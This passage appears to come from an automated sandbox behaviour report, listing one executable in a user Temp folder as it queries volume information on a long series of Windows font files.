                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
